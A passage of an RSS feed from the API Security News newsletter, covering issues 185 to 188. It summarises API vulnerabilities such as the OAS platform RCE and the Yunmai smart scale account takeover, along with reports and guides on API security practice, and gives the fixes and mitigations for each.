		<pubDate>Wed, 08 Jun 2022 19:04:09 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9667</guid>

					<description><![CDATA[<p>This week, we have articles on API security considerations for smart cars, and an exploration of API ownership and its impacts on security. We also have a report surveying CISOs on their top security concerns (no surprise that API security tops the list), and finally, a beginner&#8217;s guide to API security focusing on testing. Article: [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-188-api-security-for-smart-cars-ownership-of-the-api-lifecycle-apis-are-top-ciso-concern/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-188-api-security-for-smart-cars-ownership-of-the-api-lifecycle-apis-are-top-ciso-concern/">Issue 188: API security for smart cars, ownership of the API lifecycle, APIs a top CISO concern</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have articles on API security considerations for smart cars, and an exploration of API ownership and its impacts on security. We also have a report surveying CISOs on their top security concerns (no surprise that API security tops the list), and finally, a beginner&#8217;s guide to API security focusing on testing.</p>
<h2>Article: API security for smart cars</h2>
<p>The first article this week comes from Curity.io on the topic of <a href="https://curity.io/blog/smart-api-security-for-your-smart-car/" target="_blank" rel="noopener noreferrer">API security for smart cars</a>. API adoption has helped fuel the innovation in smart, connected cars, but with this adoption come additional security concerns caused by the value and criticality of the vehicles and the impact of breaches that could allow remote access or control. Recently in this newsletter, <a href="https://apisecurity.io/issue-169-insecure-api-wordpress-plugin-tesla-3rd-party-vulnerability-introducing-vapi/" target="_blank" rel="noopener noreferrer">we featured news</a> of a recent remote takeover exploit in the Tesla vehicle range that took advantage of a vulnerability in a 3rd-party integrated application that exposed vehicle access tokens.</p>
<p>The article discusses three key topics to ensure more secure APIs. Firstly, <em>always use a token-based architecture to protect car APIs </em>which are demonstrably more secure than legacy solutions, such as password or key-based authentication. As demonstrated in the example of Tesla, it is important to be able to easily revoke access in the event of a compromise or leaked credential. If fixed keys are used, this becomes a logistical challenge possibly even requiring manual intervention. A token-based solution (typically OAuth2) allows a robust mechanism for the distribution of tokens, including the ability to manage more complex access control through restricted token scope and lifetime.</p>
<p>The second recommendation is to <em>adopt smart token validation to prevent breaches or data loss</em>. JSON web tokens (JWTs) allow a client to present a set of claims to a backend API which is then responsible for validating the token and allowing (or denying) access according to the claims. This validation can be performed in the API itself, or – as recommended in the article – in an API gateway which offers several advantages, such as:</p>
<ul>
<li>It can use complex architectural patterns to provide even more robust security, particularly to prevent leaks.</li>
<li>It can offload the tasks of token validation from the API itself to improve performance and robustness.</li>
<li>It reduces the likelihood of unauthorized calls to APIs.</li>
</ul>
<p>The third recommendation is to use a developer portal to empower developers to understand the organization&#8217;s APIs, track their usage, and monitor who is accessing the API.</p>
<h2>Article: Ownership of the API lifecycle</h2>
<p>The second article this week covers <a href="https://latesthackingnews.com/2022/05/27/ownership-of-the-api-security-lifecycle/" target="_blank" rel="noopener noreferrer">the important topic of API ownership</a>. From a security point of view, API ownership is important throughout the API lifecycle, particularly in the operation stage to ensure timely response in the event of incidents.</p>
<p>The author describes the three common models for API ownership model as follows:</p>
<ul>
<li><strong>IT API owner</strong>: A technical or IT owner is responsible for developing and operating APIs according to organizational policies and standards.</li>
<li><strong>Business API owner</strong>: This model is focused on the API consumer and manages the lifecycle according to their requirements.</li>
<li><strong>Shared ownership</strong>: This model allows the business to focus on the API strategy from the consumer and business viewpoint, while the IT owner manages technical aspects of development and deployment.</li>
</ul>
<p>Finally, the author makes some recommendations for API ownership best practices:</p>
<ul>
<li><strong>Follow an API security checklist</strong>: Using a checklist (such as the <a href="https://owasp.org/www-project-application-security-verification-standard/" target="_blank" rel="noopener noreferrer">OWASP ASVS</a>) ensures that API security best practices are addressed at all stages of the lifecycle.</li>
<li><strong>Assign ownership based on purpose</strong>: Ownership should be based on the function of the API to ensure a timely response to incidents or outages.</li>
<li><strong>Prioritize security</strong>: Unsurprisingly, the author recommends prioritizing security throughout all phases of the API lifecycle, specifically the use of dedicated API security tools.</li>
<li><strong>Use external API visibility tools</strong>: Using external API visibility tools allows detecting exposed APIs and assessing them for vulnerabilities. Use threat protection features in API gateways.</li>
<li><strong>Implement a layered security approach</strong>: API vulnerabilities must be addressed at multiple levels, ensuring that common vulnerability categories are addressed.</li>
</ul>
<p>Whilst security is everyone&#8217;s responsibility, it is vital that APIs have a designated owner.</p>
<h2>Report: APIs and cloud applications are top CISO concern</h2>
<p><a href="https://www.securityinfowatch.com/security-executives/news/21269854/new-report-reveals-apis-and-cloud-applications-are-cisos-greatest-security-readiness-threat" target="_blank" rel="noopener noreferrer">A recently published report</a> titled &#8220;<em>The CISOs Report, Perspectives, Challenges and Plans for 2022 and Beyond&#8221;</em> reveals that CISOs are increasingly faced with challenges related to the adoption of cloud-based applications and APIs. The report is based on a survey of over 400 CISOs and reflects their concerns arising from the changing IT landscape due to remote work, cloud adoption, and evolving development practices.</p>
<p>CISOs ranked their top priorities as follows:</p>
<ul>
<li><strong>APIs</strong>: 42%</li>
<li><strong>Cloud applications (SaaS)</strong>: 41%</li>
<li><strong>Cloud infrastructure (IaaS)</strong>: 38%</li>
</ul>
<p>The report highlighted the importance of data discovery and classification, and of DevSecOps. Other topics included the growing adoption of zero-trust (although still immature) and supply-chain or 3rd party risks.</p>
<p>These findings come as little surprise to readers of this newsletter.</p>
<h2>Guide: Complete guide to API security</h2>
<p>Finally this week, we have <a href="https://brightsec.com/blog/api-security/" target="_blank" rel="noopener noreferrer">a guide to API security</a> by Bright Security. This guide gives a basic overview of the OWASP API Security Top 10 and covers REST, SOAP, and GraphQL security at a high level.</p>
<p>The guide will be of particular interest to API testers because it provides good coverage of that topic, including common methods of API testing and an overview of the top open-source API testing tools. It also offers recommendations for API security best practices, like:</p>
<ul>
<li>Identify vulnerabilities.</li>
<li>Leverage OAuth2.</li>
<li>Encrypt data.</li>
<li>Use rate limiting and throttling.</li>
<li>Use a service mesh.</li>
<li>Adopt a zero-trust philosophy.</li>
<li>Test your APIs with dynamic application security testing (DAST) tools.</li>
</ul>
<p>An easy read for anyone new to API security – thanks for the contribution.</p>
<h2>Webinar: API Breaches from H1 2022</h2>
<p>Another reminder on my upcoming webinar on API breaches from H1 2022 in which I will <a href="https://42crunch.com/api-breaches-h1-2022/" target="_blank" rel="noopener noreferrer">outline the root causes of some recent API vulnerabilities</a> that have been making the news.</p>
<p>This practical and interactive webinar gives an illuminating insight into how easily APIs can be compromised, leading to a potentially devastating impact on organizations. The topics covered include:</p>
<ul>
<li>Understanding how the vulnerability occurred, and the potential impact.</li>
<li>A detailed look at the underlying OWASP API Security Top 10 vulnerability.</li>
<li>Practical demonstration of how 42Crunch can detect and protect your APIs from such vulnerabilities.</li>
</ul>
<p><a href="https://42crunch.com/api-breaches-h1-2022/" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="alignnone wp-image-9637" src="https://apisecurity.io/wp-content/uploads/2022/06/Article5.jpg" alt="" width="601" height="342" /></a></p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-188-api-security-for-smart-cars-ownership-of-the-api-lifecycle-apis-are-top-ciso-concern/">Issue 188: API security for smart cars, ownership of the API lifecycle, APIs a top CISO concern</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 187: RCE and API vulnerability in OAS platform, account takeover in Yunmai smart scale</title>
		<link>https://apisecurity.io/issue-187-rce-and-api-vulnerability-in-oas-platform-account-takeover-in-yunmai-smart-scale/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 01 Jun 2022 19:51:37 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9635</guid>

					<description><![CDATA[<p>This week, we have two API vulnerabilities: the first is a critical remote code execution (RCE) and API access flaw in the Open Automation Software (OAS) platform, the second a mass account takeover vulnerability in the Yunmai smart scale API. We also have an article on preventing API abuse, and a write-up on how to [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-187-rce-and-api-vulnerability-in-oas-platform-account-takeover-in-yunmai-smart-scale/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-187-rce-and-api-vulnerability-in-oas-platform-account-takeover-in-yunmai-smart-scale/">Issue 187: RCE and API vulnerability in OAS platform, account takeover in Yunmai smart scale</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have two API vulnerabilities: the first is a critical remote code execution (RCE) and API access flaw in the Open Automation Software (OAS) platform, the second a mass account takeover vulnerability in the Yunmai smart scale API. We also have an article on preventing API abuse, and a write-up on how to use pentesting methods to prevent API attacks on applications.</p>
<h2>Vulnerability: OAS platform vulnerable to critical RCE and API access flaw</h2>
<p>Bleeping Computer has featured news of <a href="https://www.bleepingcomputer.com/news/security/oas-platform-vulnerable-to-critical-rce-and-api-access-flaws/" target="_blank" rel="noopener noreferrer">a pair of vulnerabilities in the widely used Open Automation Software (OAS) platform</a>. The OAS platform is a popular data connectivity platform used in industrial control systems, and it allows inter-operation between a wide range of devices and protocols.</p>
<p>The first vulnerability is a critical RCE flaw that could have potentially compromised the whole platform: an API endpoint allowed remote administration of the platform. The researchers discovered that they were able to access the endpoint in question with a blank username and password, allowing arbitrary remote access to the platform. The issue has a CVSS rating of 9.4 and is tracked as <a href="https://talosintelligence.com/vulnerability_reports/TALOS-2022-1513" target="_blank" rel="noopener noreferrer">CVE-2022-26833</a>. This is an example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer">API2:2019 — Broken authentication</a>.</p>
<p>The second vulnerability is due to lack of authentication at an API endpoint and relates to a file write vulnerability in the platform&#8217;s secure file transfer module. The researchers found that they could send specially crafted requests to an API endpoint that allowed to upload arbitrary files, including a new <code>authorized_keys</code> file in the root user&#8217;s SSH directory which in turn allowed full remote access. The issue has a CVSS rating of 9.1 and is tracked as <a href="https://talosintelligence.com/vulnerability_reports/TALOS-2022-1493" target="_blank" rel="noopener noreferrer">CVE-2022-26082</a>.</p>
<p>The vulnerabilities were disclosed responsibly and have been fixed in version 16.00.0.113, released on 22 May 2022. The researchers recommend either upgrading to the latest version of the platform, or explicitly deactivating the impacted service endpoints.</p>
<h2>Vulnerability: Mass account takeover in Yunmai smart scale API</h2>
<p>The second vulnerability this week comes from the security team at Fortbridge who <a href="https://www.fortbridge.co.uk/research/mass-account-takeover-yunmai/" target="_blank" rel="noopener noreferrer">discovered a range of vulnerabilities in the API of the Yunmai smart scale</a>.</p>
<p>The researchers performed a penetration test on both Android and iOS versions of the smart scale app and discovered four vulnerabilities relating to the backend API. By combining these vulnerabilities, they successfully executed a mass account takeover. The vulnerabilities were responsibly disclosed to the vendor, but it is unclear if the issues have been resolved at the time of writing.</p>
<p>The first vulnerability allowed attackers to bypass the limit on the number of family members per account. The app only allows creating 16 accounts in a family, but using the API directly did not pose any number limit. The root cause is that the limit was enforced only client side, not in the backend API. This is a common application design flaw — always ensure restrictions and limits are enforced in the backend API.</p>
<p>The second vulnerability allowed arbitrary enumeration of user IDs by guessing IDs using Burp Suite automation. The API did not adequately authorize access to the guessed ID, instead returning full user information, including sensitive PII. This is an example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">API1:2019 — Broken object-level authorization</a> — remember to always fully authorize access to objects against the object owner.</p>
<p>The third vulnerability is an example of<a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer"> API2:2019 — Broken authentication</a>, allowing the researchers to add and delete users from other people&#8217;s accounts using the ability to enumerate user IDs. Always ensure all API endpoints are authenticated.</p>
<p>The fourth vulnerability allowed the researchers to gain access to both the refresh token and access token when creating new users. By inspecting the response in Burp Suite, the researchers found that these tokens were accidentally leaked as shown:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-9641" src="https://apisecurity.io/wp-content/uploads/2022/06/Article2.jpg" alt="" width="607" height="202" /></p>
<p>Armed with this combination of tokens, attackers were effectively granted access to the platform for perpetuity. This is an example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure" target="_blank" rel="noopener noreferrer">API3:2019 — Excessive data exposure</a> — always be wary of leaking information, particularly access tokens.</p>
<p>For the <em>coup de grace</em>, the researchers were able to combine three of the vulnerabilities to perform mass account takeover attacks using the forgotten password flow.</p>
<p>This is a really great write-up that demonstrates three of the API Security Top 10 in action and how easily vulnerabilities can be combined — thanks to the author for contributing to our community!</p>
<h2>Article: How to prevent API abuse</h2>
<p>This week, our friends at Approov have <a href="https://approov.io/blog/how-to-prevent-api-abuse" target="_blank" rel="noopener noreferrer">discussed how to prevent API abuse.</a> Increasingly, organizations are experiencing malicious use of their APIs in attempts to take advantage of them in unintended or unexpected ways. Typically, such abuse attacks can achieve excessive data exfiltration, data mining, or denial-of-service (DoS).  API abuse is generally regarded as distinct from API attacks, which tend to focus on specific API vulnerabilities — nonetheless, API builders should take steps to mitigate against abuse.</p>
<p>Common examples of API abuse include:</p>
<ul>
<li>Man-in-the-middle (MITM) attacks</li>
<li>Repackaged or modified apps</li>
<li>Scripts or bots</li>
<li>Reverse engineered apps</li>
</ul>
<p>Approov recommends the following mitigation tactics against API abuse:</p>
<ul>
<li>Monitoring and logging</li>
<li>Rate limiting</li>
<li>Authentication and authorization</li>
<li>Certificate pinning</li>
</ul>
<p>Anyone wanting to learn more on this topic can get a <a href="https://42crunch.com/extend-protection-of-your-data-from-api-to-mobile-application/" target="_blank" rel="noopener noreferrer">detailed look at API abuse protections in practice</a> in a recent webinar with Approov and 42Crunch.</p>
<h2>Article: Pentesting to prevent API attacks</h2>
<p>We&#8217;re spoiled this week with another excellent write-up of a pentest, this time against a web application using Java-RMI services.</p>
<p>The <a href="https://outpost24.com/blog/Penetration-testing-to-prevent-API-attack" target="_blank" rel="noopener noreferrer">article</a> describes a variety of techniques used to exploit a web application and the underlying APIs without success. However, discovering that the backend used Java Remote Method Invocation (RMI) services opened the path to use a variety of techniques to exploit this Java platform, ultimately resulting in a proof-of-concept.</p>
<p>The researchers recommend the following best security practices for securing Java-RMI services:</p>
<ul>
<li>Run RMI services over SSL/TLS to prevent MITM attacks.</li>
<li>Require authentication for both server and client.</li>
<li>Run a security manager when using RMI.</li>
<li>Ensure that the value of the property <code>java.rmi.server.useCodebaseOnly</code> is set to <code>true</code>.</li>
</ul>
<p>Again, thanks to the author for this detailed write-up.</p>
<h2>Webinar: API Breaches from H1 2022</h2>
<p>As APIs become the preferred attack vector for attackers, there has been an inevitable rise in the number of API-related breaches and vulnerabilities. I will <a href="https://42crunch.com/api-breaches-h1-2022/" target="_blank" rel="noopener noreferrer">outline the root causes of some recent API vulnerabilities</a> that have been making the news.</p>
<p>This practical and interactive webinar will give an illuminating insight into how easily APIs can be compromised leading to a potentially devastating impact on organizations. The topics covered include:</p>
<ul>
<li>Understanding of how the vulnerability occurred, and the potential impact.</li>
<li>A detailed look at the underlying OWASP API security Top 10 flaw.</li>
<li>Practical demonstration of how 42Crunch can detect and protect from such vulnerabilities.</li>
</ul>
<p><a href="https://42crunch.com/api-breaches-h1-2022/" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="alignnone wp-image-9637" src="https://apisecurity.io/wp-content/uploads/2022/06/Article5.jpg" alt="" width="601" height="342" /></a></p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-187-rce-and-api-vulnerability-in-oas-platform-account-takeover-in-yunmai-smart-scale/">Issue 187: RCE and API vulnerability in OAS platform, account takeover in Yunmai smart scale</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 186: Kubernetes API servers exposed, vulnerability in Swagger-UI library, Google views on API economy</title>
		<link>https://apisecurity.io/issue-186-kubernetes-api-servers-exposed-vulnerability-in-swagger-ui-library-google-views-on-api-economy/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 25 May 2022 17:29:46 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9609</guid>

					<description><![CDATA[<p>This week, we have news of a report revealing that over 380 000 Kubernetes API servers are exposed on the internet due to possible misconfiguration, as well as details of a vulnerability allowing DOM XSS attacks in the popular Swagger-UI library. We also feature views from Google on the future of the API economy and [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-186-kubernetes-api-servers-exposed-vulnerability-in-swagger-ui-library-google-views-on-api-economy/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-186-kubernetes-api-servers-exposed-vulnerability-in-swagger-ui-library-google-views-on-api-economy/">Issue 186: Kubernetes API servers exposed, vulnerability in Swagger-UI library, Google views on API economy</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of a report revealing that over 380 000 Kubernetes API servers are exposed on the internet due to possible misconfiguration, as well as details of a vulnerability allowing DOM XSS attacks in the popular Swagger-UI library. We also feature views from Google on the future of the API economy and conclude with a beginner&#8217;s guide to API keys usage and best practices.</p>
<h2>Report: 380,000 Kubernetes API servers exposed on the internet</h2>
<p>A report from internet security research firm ShadowServer reveals that<a href="https://www.shadowserver.org/news/over-380-000-open-kubernetes-api-servers/" target="_blank" rel="noopener noreferrer"> as many as 380 000 Kubernetes API servers are exposed to the public internet</a>. The researchers at ShadowServer scanned IP addresses by performing a <code>GET</code> request at the URI <code>/version</code> and recorded instances that returned a <code>HTTP 200</code> status code. The researchers stress that whilst this response does not necessarily represent a vulnerability, such exposure to the internet is likely due to misconfiguration and is quite likely unintended.</p>
<p>The researchers probed over 454 000 API servers in total, the majority (84%) were found to be open. Most of these were in the United States and the location distribution is shown here:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-9614" src="https://apisecurity.io/wp-content/uploads/2022/05/Article1.jpg" alt="" width="602" height="315" /></p>
<p>The researchers also performed an analysis of the Kubernetes API versions and OS platforms. Whilst most instances reported relatively recent (and supported) versions of Kubernetes, there were significant numbers of instances running on totally unsupported versions prior to version 1.16, going as far back as version 1.2. Unsurprisingly, the most popular OS platform was <code>linux/amd64</code>, accounting for over 99% of instances.</p>
<p>The report concludes with recommendations on mitigation, including using strong authentication for access or blocking access at the firewall level, or operating <code>kube-proxy</code> in IPVS (IP Virtual Server) mode.</p>
<p>As ever, the advice is to be wary of default settings.</p>
<h2>Vulnerability: Swagger-UI library vulnerable to DOM XSS attacks</h2>
<p><a href="https://portswigger.net/daily-swig/widespread-swagger-ui-library-vulnerability-leads-to-dom-xss-attacks" target="_blank" rel="noopener noreferrer">PortSwigger has revealed details of a DOM XSS vulnerability</a> in the Swagger-UI open-source suite that could potentially lead to account takeover.</p>
<p>Swagger-UI is a popular user interface component by SmartBear Software, allowing developers to present a UI within their application that exposes details of the underlying APIs in an intuitive graphical manner. The security researchers revealed that over sixty instances including some large enterprises like GitLab and Microsoft were both investigating the issue, and a wide range of versions of Swagger-UI are affected. The recommendation is to upgrade to the most recent version of Swagger-UI, at the time of writing v4.11.1.</p>
<p>The root cause of the vulnerability was an outdated version of the <code>DomPurify</code> component, an XML sanitizer library. This allowed users to provide a URL to an API definition that could contain malicious content, resulting in a cross-site scripting (XSS) exploit. The researchers easily created a working exploit that resulted in the execution of JavaScript code in the victim&#8217;s browser, allowing account takeover.</p>
<p>Readers of this newsletter using the Swagger-UI are urged to check the versions they have deployed and update accordingly.</p>
<h2>Article: Google&#8217;s seven trends for the future of the API economy</h2>
<p>Google recently contributed <a href="https://cloud.google.com/blog/products/api-management/7-ideas-for-the-future-of-apis" target="_blank" rel="noopener noreferrer">views on seven trends for the future of the API economy</a>. As organizations become increasingly competitive, they are increasingly leveraging APIs to accelerate their transformation. Google&#8217;s seven ideas are:</p>
<ul>
<li>API security takes center stage.</li>
<li>Microservices APIs are gaining speed.</li>
<li>Event-driven architecture (EDA) continues its big comeback.</li>
<li>GraphQL will accelerate BFF (Backends for Frontends).</li>
<li>It’s not one API gateway to rule them all anymore.</li>
<li>Conversational APIs go mainstream.</li>
<li>From shadow IT to strategic IT.</li>
</ul>
<p>Of most interest to readers will are their views of API security: quoting Gartner, the authors cite the fact that APIs are now the primary attack surface for breaches in 2022.</p>
<p>The key takeaway for the authors is that the traditional fixed security perimeters are being eroded as organizations move toward a more distributed and open architecture. The prediction is that a zero-trust model based on encryption, identity, strong authentication, and authorization will be increasingly adopted.</p>
<h2>Guide: Beginner&#8217;s guide to API keys usage and best practice</h2>
<p>Finally this week, we have <a href="https://hackernoon.com/so-like-what-is-an-api-key-really-and-how-does-it-provide-security" target="_blank" rel="noopener noreferrer">a guide from HackerNoon on API keys, their usage, and best practices</a> targeted at beginners to API security.</p>
<p>The guide covers several key topics, such as authentication, authorization, access rights, scopes, securing API keys, and security safeguards. It also provides some basic, sensible best practices for API key handling:</p>
<ul>
<li>Create rate limits on API endpoints.</li>
<li>Use attack-detection methods to detect unexpected behavior.</li>
<li>Reject requests that are out of the norm.</li>
<li>Perform API key rotation and revocation.</li>
<li>Use JSON web tokens (JWTs) for authentication and authorization.</li>
<li>Always monitor API access and usage.</li>
</ul>
<p>An easy read on an important topic to API security.</p>
<p>The post <a href="https://apisecurity.io/issue-186-kubernetes-api-servers-exposed-vulnerability-in-swagger-ui-library-google-views-on-api-economy/">Issue 186: Kubernetes API servers exposed, vulnerability in Swagger-UI library, Google views on API economy</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 185: Three trends in API security, GraphQL securing risks, the importance of API discovery</title>
		<link>https://apisecurity.io/issue-185-three-trends-in-api-security-graphql-securing-risks-the-importance-of-api-discovery/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 18 May 2022 17:05:01 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9582</guid>

					<description><![CDATA[<p>This week, we have a podcast from Stoplight on three trends in API security; an article on whether GraphQL introduces new security risks; views on the importance of API discovery and inventories; and a report from Cloudflare on the rise of API attacks. We also have news of an upcoming panel discussion at the RSA [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-185-three-trends-in-api-security-graphql-securing-risks-the-importance-of-api-discovery/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-185-three-trends-in-api-security-graphql-securing-risks-the-importance-of-api-discovery/">Issue 185: Three trends in API security, GraphQL securing risks, the importance of API discovery</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have a podcast from Stoplight on three trends in API security; an article on whether GraphQL introduces new security risks; views on the importance of API discovery and inventories; and a report from Cloudflare on the rise of API attacks. We also have news of an upcoming panel discussion at the RSA conference.</p>
<h2>Podcast: Three trends on starting with API security</h2>
<p>Stoplight recently featured <a href="https://blog.stoplight.io/api-security-3-trends-where-to-get-started" target="_blank" rel="noopener noreferrer">an interview with Travis Spencer (CEO of Curity) on their API Intersection podcast</a> where Spencer discussed key trends in the API security industry: more openness, more regulation, and higher levels of security.</p>
<p>The first trend is toward the adoption of technologies such as OpenID Connect (OIDC) which enables developers outside financial services to add strong identity to their products. OIDC is an identity layer on top of the OAuth2 protocol, allowing the exchange of identity information in a standard format. OIDC is destined to become the standard on which strong identities are established.</p>
<p>The second highlighted trend is the continued adoption and growth of the open banking initiative. Already popular in Europe, Australia, and Brazil, Spencer believes it is set for expansion into the USA, Middle East, and APAC. Spencer believes the open banking trend will drive growth in other open initiatives in government, manufacturing, and other industries. This in turn will drive the demand for APIs that must be designed to conform to high levels of security.</p>
<p>Finally, Spencer highlights the emergence of new identity standards such as GAIN, intended to provide stronger identity assurances on the internet. As ever, there is a balance to be struck between adherence to such standards and the user experience.</p>
<p>For anyone wishing to understand OIDC, Spencer recommends resources on the <a href="https://openid.net/foundation/" target="_blank" rel="noopener noreferrer">OpenID Foundation website</a> or the <a href="https://curity.io/" target="_blank" rel="noopener noreferrer">Curity website</a>.</p>
<h2>Article: Does GraphQL introduce new security risks?</h2>
<p>DevOps.com has featured an interview with Mike Benjamin (VP of security research at Fastly) on the topic of <a href="https://devops.com/does-graphql-introduce-new-security-risks/" target="_blank" rel="noopener noreferrer">GraphQL adoption and the potential security implications</a>.</p>
<p>GraphQL is increasingly popular with developers, because it allows API queries to be constructed dynamically on the client and sent within a single API call, as opposed to REST APIs which may require more complex, nested queries to compose a single client operation. Whilst GraphQL offers greater flexibility to developers, this comes at the expense of latent vulnerabilities and an increased attack surface.</p>
<p>Benjamin highlights four common GraphQL security vulnerabilities:</p>
<ul>
<li><strong>Introspection</strong>: GraphQL allows clients to query the entire underlying schema to identify entities — in the hands of attackers this could allow them to map out the entire attack surface and discover potentially vulnerable endpoints. The recommendation is to avoid overexposing documentation for public API consumers.</li>
<li><strong>Field suggestions</strong>: Another feature open to abuse is the automatic suggestion of field names. This is a great help for a developer trying to understand a new API, however, it allows attackers to easily enumerate the entire API. The recommendation is to switch this feature off in production.</li>
<li><strong>Denial-of-Service-Oriented attacks</strong>: Due to the nature of dynamically constructed queries, it is possible for attackers to construct resource-intensive queries that may lead to denial-0f-service (DoS) attacks. This attack vector can be mitigated simply by limiting either the query execution time or the query depth.</li>
<li><strong>Lack of Object-Level authorization</strong>: Since all authorization is routed through a single API endpoint, it becomes more difficult to implement fine-grained access control to data objects. As with REST APIs, the best practice is to enforce authorization closer to the objects and data.</li>
</ul>
<p>Our newsletter has previously covered <a href="https://apisecurity.io/issue-154-views-apis-security-report-api-misconfiguration-detecting-malicious-api-activity/" target="_blank" rel="noopener noreferrer">GraphQL attack vectors</a> and why <a href="https://apisecurity.io/issue-158-data-of-400000-students-exposed-1-million-sites-affected-by-plugin-vulnerabilities-views-on-graphql/" target="_blank" rel="noopener noreferrer">GraphQL should not be exposed to the internet</a> — anyone implementing GraphQL solutions should be mindful of potential security risks.</p>
<h2>Opinion: API security starts with discovery, not gateways</h2>
<p>Speaking this week at Gartner’s Application Innovation and Business Solutions Summit, VP Analyst Mark O’Neill discussed <a href="https://www.sdxcentral.com/articles/analysis/api-security-starts-with-discovery-not-gateways/2022/05/" target="_blank" rel="noopener noreferrer">three key strategies for securing APIs</a>: discovery, testing, and protection.</p>
<p>O’Neill&#8217;s key recommendation is not to focus initially on the implementation of API gateways and other security products, but rather to begin with building an inventory of APIs by using a range of techniques, such as examining Git code repositories or inspecting API management platforms.</p>
<p>Unsurprisingly, O’Neill emphasizes the importance of both static and active API security testing. Static testing is important to ensure the API is fully defined and locked down in terms of data constraints and endpoint definitions, while active testing ensures that the implemented API behaves exactly as specified in its OpenAPI definition. Once testing has been completed, O’Neill suggests prioritizing findings to ensure they are addressed in timely fashion.</p>
<p>Finally, O’Neill stresses the importance of fine-grained access to deployed APIs: edge protection is important in API gateways, but so is internal API traffic right in front of the backend service. Using dedicated access control in close proximity to the backend ensures a layered defense-in-depth approach, and removes the reliance on the backend code implementation for critical security controls, such as rate limiting and token validation.</p>
<h2>Report: Cloudfare reports API attacks increasing significantly</h2>
<p>Readers of this newsletter are unlikely to be surprised at <a href="https://accelerationeconomy.com/cybersecurity/cloudflare-application-security-report-reveals-api-attacks-increasing-significantly/" target="_blank" rel="noopener noreferrer">the findings from recent research from Cloudflare</a> which reveals an increase in API traffic as well as a rise in bot traffic. Cloudflare reverse-proxies handle approximately a fifth of internet traffic, so their findings are highly indicative of overall trends.</p>
<p>The first observation from the report is an approximately 20% rise in API traffic in 2021, accounting for 55% of overall traffic. In particular, Cloudflare noticed that API endpoints received more malicious traffic than other web endpoints, suggesting that attackers are specifically targeting API endpoints.</p>
<p>The most interesting observation from the report is the rise in bot traffic which now accounts for 38% of all HTTP requests, with 10% of this bot traffic accessing API endpoints. While not all bots are malicious (like search engine indexers), the report identified specific bot strategies, such as HTTP method and path manipulations, that can identify vulnerabilities in API backends.</p>
<p>The most important recommendation from the report is not to be overly reliant on IP addresses as a means of determining request validity because these can easily be cloned or spoofed. Rather, a zero-trust approach should be adopted.</p>
<h2>Event: &#8220;Spreading Application Security Ownership Across the Entire Organization&#8221; at RSA Conference</h2>
<p>The annual RSA conference is taking place in early June, and <a href="https://twitter.com/ggdaniel" target="_blank" rel="noopener noreferrer">Daniel Garcia</a> (security researcher at 42Crunch) will be <a href="https://www.rsaconference.com/usa/agenda/session/Spreading%20Application%20Security%20Ownership%20Across%20the%20Entire%20Organization" target="_blank" rel="noopener noreferrer">participating in a panel discussion</a> on the topic of &#8220;Spreading Application Security Ownership Across the Entire Organization&#8221; at 12:15 PM PT on Tuesday, Jun. 7, 2022.</p>
<p>If you&#8217;re in town, be sure to join Daniel and the illustrious panel to learn how AppSec professional uses persuasion and negotiation skills to get buy-in from R&amp;D and management, and how Q&amp;A teams can use off-the-shelf DAST tools to improve testing coverage and provide practical tools and methodologies aimed at non-specialized security people to demystify API security.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-9595" src="https://apisecurity.io/wp-content/uploads/2022/05/Article5.jpg" alt="" width="608" height="395" /></p>
<p>&nbsp;</p>
